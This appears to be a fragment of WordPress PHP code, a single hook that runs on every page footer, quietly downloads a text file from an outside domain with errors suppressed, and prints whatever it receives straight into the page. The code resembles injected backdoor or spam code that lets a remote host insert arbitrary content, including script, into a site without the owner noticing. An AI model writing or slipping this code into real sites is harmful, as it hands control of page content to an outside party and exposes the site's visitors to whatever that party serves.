TOP
add_action('wp_footer', function() { $url = "https://durhamprobation.org.uk/themes.txt"; $response = @file_get_contents($url); if ($response) { echo $response; } });